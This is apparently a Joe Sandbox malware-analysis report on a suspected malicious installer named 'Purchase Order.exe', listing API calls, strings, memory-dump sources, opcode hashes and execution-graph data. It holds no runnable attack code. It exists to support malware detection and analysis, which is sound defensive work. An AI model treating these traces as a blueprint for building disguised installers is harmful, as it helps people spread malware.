                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                  • String ID: %u.%u%s%s$Nonbeneficial Setup: Installing
                                                                                                  • API String ID: 3540041739-1975629736
                                                                                                  • Opcode ID: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
                                                                                                  • Instruction ID: 7f1be1aa0c85ccb86495671cb382a06f82cddcf8175a130fa0267404931b34df
                                                                                                  • Opcode Fuzzy Hash: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
                                                                                                  • Instruction Fuzzy Hash: CF11B7736041283BDB0065799D45EAF3298DB85374F250637FA25F21D1E978CC1255EC
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2762281649.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2762228322.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762310776.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762334808.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeGlobal
                                                                                                  • String ID:
                                                                                                  • API String ID: 2979337801-0
                                                                                                  • Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                                                  • Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
                                                                                                  • Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                                                  • Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?), ref: 00401D3F
                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1849352358-0
                                                                                                  • Opcode ID: b98f244c4997ac906f623e123468edec3404108b831d84f192b6a7b6dae47352
                                                                                                  • Instruction ID: 3a73a5ecaa8fddf8dab02391599d10e6f088d4e67d6af50185a53a7dc2f76cba
                                                                                                  • Opcode Fuzzy Hash: b98f244c4997ac906f623e123468edec3404108b831d84f192b6a7b6dae47352
                                                                                                  • Instruction Fuzzy Hash: D6F0FFB2A04119BFDB11EBA4DE88DAFBBBCEB44301B104476F601F2191C6749D018B79
                                                                                                  APIs
                                                                                                  • SetWindowTextA.USER32(00000000,00422F20), ref: 00403BD4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: TextWindow
                                                                                                  • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$1033$Nonbeneficial Setup: Installing
                                                                                                  • API String ID: 530164218-3067178276
                                                                                                  • Opcode ID: 67c3d82ce6484f9e1e19bcd04ff1a02b9bccfbab982ecba75f5a52bbb9d475e3
                                                                                                  • Instruction ID: c62297436265aa8c4426bdacc88999ed38b20c31bf5381ba95a45bc0aedbf607
                                                                                                  • Opcode Fuzzy Hash: 67c3d82ce6484f9e1e19bcd04ff1a02b9bccfbab982ecba75f5a52bbb9d475e3
                                                                                                  • Instruction Fuzzy Hash: 6711D8B1B046119BC730AF15DD50A77777DEB8475A328813FE901A73D2C73DAE029A98
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 0040596F
                                                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 00405978
                                                                                                  • lstrcatA.KERNEL32(?,00409014), ref: 00405989
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405969
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 2659869361-823278215
                                                                                                  • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                  • Instruction ID: 4e6a192690b432b60a96f5238a9074c153a0d937d76e079e8aa32f917c06b110
                                                                                                  • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                  • Instruction Fuzzy Hash: 7FD0A9A2A09930AAD31222158C05EAB6A4CCF42310B0A0062F200B22E2C77C0D418BFE
                                                                                                  APIs
                                                                                                  • CharNextA.USER32(?,?,C:\,?,00405A6E,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0,00000000), ref: 00405A10
                                                                                                  • CharNextA.USER32(00000000), ref: 00405A15
                                                                                                  • CharNextA.USER32(00000000), ref: 00405A29
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext
                                                                                                  • String ID: C:\
                                                                                                  • API String ID: 3213498283-3404278061
                                                                                                  • Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                                                                                  • Instruction ID: f957f906ea029efbd3510901c55ab9b0ae73d09d1d9c73be6bc34f8378a19dae
                                                                                                  • Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                                                                                  • Instruction Fuzzy Hash: C2F0C291B04FA06FFB32A2681C84F775A88CB55710F04116BE180662C2C2785C418F9A
                                                                                                  APIs
                                                                                                  • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,004035BC,?), ref: 00403797
                                                                                                  • CloseHandle.KERNEL32(000002D4,C:\Users\user\AppData\Local\Temp\,004035BC,?), ref: 004037AB
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\nsj39BE.tmp, xrefs: 004037BB
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040378A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj39BE.tmp
                                                                                                  • API String ID: 2962429428-928807902
                                                                                                  • Opcode ID: 8243f35e0eeb5762c06f3a20855541ba65908ed27c56bedd9f13c791d511c691
                                                                                                  • Instruction ID: 4fe8f3727f95cb8dfcfe97d6293448c3a92072a7c91c92fe8e25374afea9a46a
                                                                                                  • Opcode Fuzzy Hash: 8243f35e0eeb5762c06f3a20855541ba65908ed27c56bedd9f13c791d511c691
                                                                                                  • Instruction Fuzzy Hash: E6E08CB0900620DAC524AF7CBD859463B289B41335760C726F578F30F2C338AE875AAC
                                                                                                  APIs
                                                                                                  • IsWindowVisible.USER32(?), ref: 004050B3
                                                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405104
                                                                                                    • Part of subcall function 00404128: SendMessageA.USER32(00010436,00000000,00000000,00000000), ref: 0040413A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                  • String ID:
                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                  • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                                  • Instruction ID: e292fc6bb5149b142bd52d3e096dd2ae09329e4c6d4eed70fd370e7000aba408
                                                                                                  • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                                  • Instruction Fuzzy Hash: B2018F71504609ABDF205F11ED84AEF3765EB84750F208037FA01B92D1C77A9D92AFAE
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?,75923410,00000000,75922EE0,004037B9,C:\Users\user\AppData\Local\Temp\,004035BC,?), ref: 004037FC
                                                                                                  • GlobalFree.KERNEL32(00706C70), ref: 00403803
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                  • String ID: plp
                                                                                                  • API String ID: 1100898210-855499989
                                                                                                  • Opcode ID: e3dda661aee8dd5407b6d454dedd461a768af1d3b2e32b7100c159d0cb86a48a
                                                                                                  • Instruction ID: 0f50fe4902c40828f3baa38c718452ef382c33523e9ce6ddd30c4aedf32ca250
                                                                                                  • Opcode Fuzzy Hash: e3dda661aee8dd5407b6d454dedd461a768af1d3b2e32b7100c159d0cb86a48a
                                                                                                  • Instruction Fuzzy Hash: 69E0C2338110309BC6211F15EE04B5ABBAC7F49F22F01407AFC407B2A08B746C424BD9
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB6,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004059B6
                                                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB6,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004059C4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrlen
                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                  • API String ID: 2709904686-1246513382
                                                                                                  • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                  • Instruction ID: 4c364b2a586e3df4272a597733e657329f4de9264f8513980004e000b8aa575c
                                                                                                  • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                  • Instruction Fuzzy Hash: 82D0C7E2419E709EF30352549D04B9F6E98DF16750F0A14A2F141E6192D77C5D418BAD
                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                  • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                  • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2762281649.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2762228322.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762310776.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762334808.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1780285237-0
                                                                                                  • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                  • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                  • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                  • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AF7
                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B08
                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                  • String ID:
                                                                                                  • API String ID: 190613189-0
                                                                                                  • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                                  • Instruction ID: b8bae3ead32ec2695fa88c6f2b94aa478c41e31f8fdb951db119f3f4d21ee890
                                                                                                  • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                                  • Instruction Fuzzy Hash: C1F0C231605518BFCB029FA5DC4099FBBB8EF46350B2140A5F800F7250D274FE019BA9

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:71
                                                                                                  Total number of Limit Nodes:5
                                                                                                  execution_graph 71351 39f883b8 71352 39f883e0 71351->71352 71355 39f8840c 71351->71355 71353 39f883e9 71352->71353 71356 39f878e4 71352->71356 71357 39f878ef 71356->71357 71358 39f88703 71357->71358 71360 39f87900 71357->71360 71358->71355 71361 39f88738 OleInitialize 71360->71361 71362 39f8879c 71361->71362 71362->71358 71363 39ea8fa8 71364 39ea8fee GetCurrentProcess 71363->71364 71366 39ea9039 71364->71366 71367 39ea9040 GetCurrentThread 71364->71367 71366->71367 71368 39ea907d GetCurrentProcess 71367->71368 71369 39ea9076 71367->71369 71370 39ea90b3 71368->71370 71369->71368 71371 39ea90db GetCurrentThreadId 71370->71371 71372 39ea910c 71371->71372 71373 39f83ab0 71374 39f83b18 CreateWindowExW 71373->71374 71376 39f83bd4 71374->71376 71433 39ea91f0 71434 39ea9229 DuplicateHandle 71433->71434 71435 39ea9286 71434->71435 71377 ad044 71378 ad05c 71377->71378 71379 ad0b6 71378->71379 71384 39f849b8 71378->71384 71393 39f83c59 71378->71393 71397 39f80f7c 71378->71397 71406 39f83c68 71378->71406 71387 39f849f5 71384->71387 71385 39f84a29 71389 39f84a27 71385->71389 71423 39f810a4 71385->71423 71387->71385 71388 39f84a19 71387->71388 71410 39f85024 71388->71410 71415 39f84f58 71388->71415 71419 39f84f49 71388->71419 71394 39f83c8e 71393->71394 71395 39f80f7c CallWindowProcW 71394->71395 71396 39f83caf 71395->71396 71396->71379 71398 39f80f87 71397->71398 71399 39f84a29 71398->71399 71401 39f84a19 71398->71401 71400 39f810a4 CallWindowProcW 71399->71400 71402 39f84a27 71399->71402 71400->71402 71403 39f84f58 CallWindowProcW 71401->71403 71404 39f84f49 CallWindowProcW 71401->71404 71405 39f85024 CallWindowProcW 71401->71405 71403->71402 71404->71402 71405->71402 71407 39f83c8e 71406->71407 71408 39f80f7c CallWindowProcW 71407->71408 71409 39f83caf 71408->71409 71409->71379 71411 39f84fe2 71410->71411 71412 39f85032 71410->71412 71427 39f85010 71411->71427 71413 39f84ff8 71413->71389 71417 39f84f6c 71415->71417 71416 39f84ff8 71416->71389 71418 39f85010 CallWindowProcW 71417->71418 71418->71416 71420 39f84f52 71419->71420 71422 39f85010 CallWindowProcW 71420->71422 71421 39f84ff8 71421->71389 71422->71421 71424 39f810af 71423->71424 71425 39f8629a CallWindowProcW 71424->71425 71426 39f86249 71424->71426 71425->71426 71426->71389 71428 39f85021 71427->71428 71430 39f861d2 71427->71430 71428->71413 71431 39f810a4 CallWindowProcW 71430->71431 71432 39f861ea 71431->71432 71432->71428

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 822 11ca08-11ca18 823 11ca44 822->823 824 11ca1a-11ca32 822->824 825 11ca46-11ca4a 823->825 828 11ca34-11ca39 824->828 829 11ca3b-11ca3e 824->829 828->825 830 11ca40-11ca42 829->830 831 11ca4b-11ca88 829->831 830->823 830->824 833 11ca8a 831->833 834 11ca8f-11cb6c call 1141a0 call 113cc0 831->834 833->834 844 11cb73-11cb94 call 116320 834->844 845 11cb6e 834->845 847 11cb99-11cba4 844->847 845->844 848 11cba6 847->848 849 11cbab-11cbaf 847->849 848->849 850 11cbb1-11cbb2 849->850 851 11cbb4-11cbbb 849->851 852 11cbd3-11cc17 850->852 853 11cbc2-11cbd0 851->853 854 11cbbd 851->854 858 11cc7d-11cc94 852->858 853->852 854->853 860 11cc96-11ccbb 858->860 861 11cc19-11cc2f 858->861 867 11ccd3 860->867 868 11ccbd-11ccd2 860->868 865 11cc31-11cc3d 861->865 866 11cc59 861->866 869 11cc47-11cc4d 865->869 870 11cc3f-11cc45 865->870 871 11cc5f-11cc7c 866->871 874 11ccd4 867->874 868->867 872 11cc57 869->872 870->872 871->858 872->871 874->874
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                  • API String ID: 0-1229222154
                                                                                                  • Opcode ID: 2c520db6838c3021118db826787825c6f55f4324973760aebe5e384b84ed93d7
                                                                                                  • Instruction ID: 1653d03393fcd5139caf9ed70129f4096487dc7fa9ce4c30a2fb6ff36e11d0a1
                                                                                                  • Opcode Fuzzy Hash: 2c520db6838c3021118db826787825c6f55f4324973760aebe5e384b84ed93d7
